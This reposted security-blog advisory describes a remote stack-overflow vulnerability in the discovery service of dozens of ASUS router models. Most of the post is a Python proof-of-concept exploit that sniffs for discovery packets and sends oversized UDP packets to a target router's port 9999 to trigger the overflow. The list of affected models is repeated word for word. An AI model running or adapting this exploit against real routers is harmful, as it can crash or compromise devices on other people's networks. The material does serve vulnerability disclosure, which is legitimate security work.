Remote Command/Code Execution Vulnerability on Multi ASUS wiress router models – Penetration Testing

Vulnerability Description

When an ASUS router discovers another router device, it does not buffer the size of all discovered devices when it is added to the device list to cause a stack overflow, resulting in a remote code/command execution vulnerability. The vulnerability code is as follows:

http://ift.tt/2tOOUCB

Vulnerability Details

Affected Vendor:

RT-AC5300,RT_AC1900P,RT-AC68U,RT-AC68P,RT-AC88U, RT-AC66U,RT-AC66U_B1,RT-AC58U,RT-AC56U,RT-AC55U,RT-AC52U,RT-AC51U, RT-N18U,RT-N66U,RT-N56U,RT-AC3200,RT-AC3100,RT_AC1200GU, RT_AC1200G,RT-AC1200,RT-AC53,RT-N12HP,RT-N12HP_B1,RT-N12D1, RT-N12+,RT_N12+_PRO,RT-N16,RT-N300 and Asuswrt-Merlin(http://ift.tt/1rrb09q) RT-AC5300,RT_AC1900P,RT-AC68U,RT-AC68P,RT-AC88U, RT-AC66U,RT-AC66U_B1,RT-AC58U,RT-AC56U,RT-AC55U,RT-AC52U,RT-AC51U, RT-N18U,RT-N66U,RT-N56U,RT-AC3200,RT-AC3100,RT_AC1200GU, RT_AC1200G,RT-AC1200,RT-AC53,RT-N12HP,RT-N12HP_B1,RT-N12D1, RT-N12+,RT_N12+_PRO,RT-N16,RT-N300 and Asuswrt-Merlin(http://ift.tt/1rrb09q)

Affected Product:

ASUS Wireless Router

Affected Version:

all the latest firmware
Platform: router

Impact:

Remote Command/Code Execution

POC

<<<EOF
# coding=utf-8

import time
import socket
import sys
import os
import threading
import struct
import random
import time
''' Please run PoC first, and it must run on windows '''
class ASUSDiscoveryBufferOverflow:
""" set remote host and remote port to use exp """
def __init__(self, RHOST, RPORT, LHOST):
self.RHOST = RHOST
self.RPORT = RPORT
self.LHOST = LHOST

def exploit(self):
""" execute exploit """
self.searchDevice()
self.sentShellCode()

def searchDevice(self, socket_prot = socket.IPPROTO_UDP):
""" search ASUS Discovery packet """
print(" [-] try to search ASUS Discovery packet")
while(True):
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_prot)
sniffer.bind((self.LHOST, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
if os.name == 'nt':
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

pkt, hosts = sniffer.recvfrom(65565)

if self.RHOST == hosts[0] and '\x11' == pkt[9]:
if (pkt[28] == '\x0C' and
pkt[29] == '\x15' and
pkt[30] == '\x1F' ):
print(" [+] bingo!")
break

def sentShellCode(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

for i in range(15):
s.sendto(self.makeShellCode(), (self.RHOST, self.RPORT))
print(" [-] sent %d cycle" % (i + 1))
time.sleep(0.2)

def generatingRandomMacAddr(self):
tmp1 = random.randint(0, 0xff)
tmp2 = random.randint(0, 0xff)
tmp3 = random.randint(0, 0xff)
tmp4 = random.randint(0, 0xff)
tmp5 = random.randint(0, 0xff)
tmp6 = random.randint(0, 0xff)
return struct.pack('6B', \
tmp1, tmp2, tmp3, tmp4, tmp5, tmp6)

def makeShellCode(self):
shellcode = "\x0c\x16\x1f\x00" # HEADER [ PLEASE NOT MODIFY ]
shellcode += (128 * b'A') # PKT_GET_INFO.PrinterInfo
shellcode += (32 * b'A') # PKT_GET_INFO.SSID
shellcode += (32 * b'A') # PKT_GET_INFO.NetMask
shellcode += (32 * b'A') # PKT_GET_INFO.ProductID
shellcode += (16 * b'A') # PKT_GET_INFO.FirmwareVersion
shellcode += b'A' # PKT_GET_INFO.OperationMode
shellcode += self.generatingRandomMacAddr() # PKT_GET_INFO.MacAddress
shellcode += (261 * b'A') #

return shellcode

def main():
poc = ASUSDiscoveryBufferOverflow('192.168.2.1', 9999, '127.0.0.1')

print("[+] Try to use exploit …")

poc.exploit()

print("[+] use exploit sucessful.")

if __name__ == '__main__':
main()
EOF;

Source: seclists

The post Remote Command/Code Execution Vulnerability on Multi ASUS wiress router models appeared first on Penetration Testing.

http://ift.tt/2ucAyyj http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s